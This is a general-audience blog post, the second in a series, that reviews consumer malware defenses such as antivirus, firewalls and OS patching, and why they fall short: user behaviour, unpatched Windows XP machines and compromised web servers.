The Batman Approach Part II: Current Malware Defenses & Their Downfalls

by Jordan Spencer Cunningham on

Security ShieldWe in the digital world have not been left utterly desolate in our crusade in defending against the classlessness of the common virus maker. Countless tools exist that help the common user defend against the innumerable threats viruses present, mainly in the forms of antimalware suites (I only ever recommend Malwarebytes as nothing else I’ve seen works half as well) and firewalls.  These two types of tools are the main defenses of operating systems against viruses and hackers. Another important layer of defense is for operating system developers such as Microsoft, Apple, and the Linux communities to create rock-solid code and preemptively patch holes and bugs before they are discovered and subverted for malevolent purposes. The question, however, is are these defenses working, and are they enough?


See The Batman Approach Part I: Historical & Modern Malware/Antimalware

See The Batman Approach Part III: The Only Way Forward Against Malware

Contemprary Defenses

Antimalware programs, commonly known as antivirus, are plentiful—always a sure sign that malware is abundant and thriving. There are dozens of major antivirus providers, some that have made available free versions of varying quality, and most that provide premium versions also of varying quality. Each is capable of removing thousands of different kinds of viruses, and all of them have certainly been responsible for keeping the spread of viruses down to a certain level.

Firewalls are a pillar of defense in computer security. Simply enough, firewalls are software (and, in larger and more technical environments, a combination of software and hardware) that lets certain traffic in or out of a network or computer depending on certain criteria. Most consumer firewalls, built into consumer routers and operating systems like Windows, are preconfigured to allow all outbound traffic initiated by local resources (such as a user loading web pages or downloading email) and to block all inbound traffic initiated by external resources (such as an outside user trying to access a web or SSH server). Even the best firewalls can’t always protect against user stupidity, but they do block dozens to hundreds of hacking attempts daily, even on small home networks. Without them, computers would be sitting ducks and would be hacked and infected within minutes of connecting to the internet.

Malware writers and hackers are never at rest; constantly they search for new vulnerabilities and continuously exploit them. It’s no surprise, then, that manufacturers of common operating systems are constantly hard at work also trying to find these vulnerabilities and to fix them. Microsoft releases Windows patches at least once a month, Apple releases patches for Mac OS several times a year, and the many different Linux distributions have various methods of releasing and distributing updates, but some may have minor updates as frequently as every night. Apple and Microsoft keep information about their patches under lock and key until they’re released so as to keep the information about the vulnerabilities out of the hands of those who would use it for malevolent purposes.

The Linux PenguinLinux operating systems are generally patched quickly after vulnerabilities are discovered. Because it’s open source1, many have claimed that it’s much more vulnerable to exploits since anyone can analyze the structure behind the system and then take advantage of it. However, the structure of Linux, BSD, Mac OS (which is based partially upon BSD), and other UNIX-like systems have proven the tests of time to have very few viruses that have actually had any significant spread outside of laboratories, and they’ve also had very few major exploits when opposed to Windows. This is, of course, the rule with the exception of Android, a flavor of Linux that has an uncharacteristic amount of available malware, though most of them spread due to user stupidity rather than like an actual worm.

Linux and other Unix-like operating systems today run nearly two-thirds of the world’s web servers while Windows runs the final third. System administrators of the literally tens of millions of web servers2 usually try to keep the systems up to date, establish rigorous security protocols, eliminate exploitable code, scan for and fix vulnerabilities, and monitor for attacks.

Downfalls of Contemporary Defenses

Despite these various security measures, many of which are available for free, nearly a quarter of Windows machines worldwide are not protected by even basic antimalware, and viruses still break through advanced antivirus protection quite often enough as it is. Also, antivirus software, especially on Windows computers, cannot protect against the stupidity of the user: a significant portion of malware and potentially unwanted programs3 are either directly installed or indirectly caused to be installed by the poor choices and lack of comprehension of computer users. Users attempting to download illegal versions of software and media or searching for pornography as well as users who click links in emails or open email attachments in emails both from unknown or suspect sources have computers that are among the most infected worldwide, oftentimes without the user even knowing. Additionally, even the most angelic web surfers shoot themselves in the feet by never updating their operating systems or the software that resides on them. Much of this ill-advised activity cannot be protected by antivirus and firewalls.

Goodbye, Windows XPAdditionally, as of this writing and for three months prior, over ten percent of computers worldwide are still running Windows XP. Windows XP was originally released in 2001, and it was superseded by three operating systems starting in 2007 and an upcoming fourth operating system in 2015. Microsoft officially stopped supporting Windows XP in April of 2014, meaning that no more vulnerabilities will be patched. Windows XP’s age and lack of support has made it a prime target for hackers and malware writers; with nearly seventeen percent of computers still running Windows XP at the time of this writing—some in vital business applications such as ATMs and medical machines—millions of machines are more vulnerable than ever before, both directly by being outdated and indirectly by simply coexisting with XP machines that could potentially spread malware to them.

Servers are another matter. These computers are critical to be kept secure since a majority malware distributed online comes from legitimate servers that have been compromised. These kinds of exploits are due to the operating system or applications not being kept up to date, poor security settings, a lack of defenses, or poor web coding. Of the millions of web servers connected to the internet today, many don’t get the administrative attention they need, and if they do, much of the web code running on them doesn’t. Servers don’t even have to be completely overtaken by attackers to become dangerous vectors for malware; most often all the attacker does is inject a small malicious code into certain portions of a website, and then the server performs malicious actions such as downloading malware, redirecting to fraudulent bank sites to steal information, or something else, often without the server owner even knowing. Compromised servers are potentially more dangerous than an army of infected workstations as they have much higher processing capacities and often interact with thousands to millions of other machines each day, not to mention the sensitive information many servers are supposed to keep safe.

This is just a taste of the widespread malware epidemic worldwide. Despite the widespread adoption of antivirus tools and security measures, it is evident that malware even sometimes pervades protected environments. This is often due to user stupidity, but viruses can still find their way through networks without the help of clueless and thoughtless users or poorly configured servers.

  1. Open source operating systems, the most popular family of which is Linux, have their code available for the world to see; their licenses almost always allow anyone to take the code and alter it to fit his or her needs, much unlike the closed source code of Windows and Mac OS. Open source operating systems, due to their openness and their licenses allowing people to alter and copy freely, are free sometimes with optional paid premium support, also unlike Windows and Mac OS.
  2. While it’s extremely hard to accurately state just how many web servers exist on the internet, the illegal but comprehensive and unprecedented 2012 Internet Census reports about 70 million IP addresses with port 80 open. While it’s certain that many of these IP addresses are poorly configured home routers, security cameras, and other common devices with web interfaces, the majority of them are most likely actual web servers hosting one or more websites. By the way, there were an estimated 634 million total websites around the same time of the previously described census in 2012. We’re likely closer to 900 million by now.
  3. Potentially unwanted programs, classified as PUPs by most antimalware firms, are programs that often demonstrate virus characteristics but may have actually been installed by the user on purpose and actually have no subversive means. They are often sneakily installed when the user installs another legitimate program downloaded from an improper source. The most common PUPs are software such as SearchProtect, Conduit, and a wide array of other sneaky softwares that hijack the browser homepage and inject ads into websites.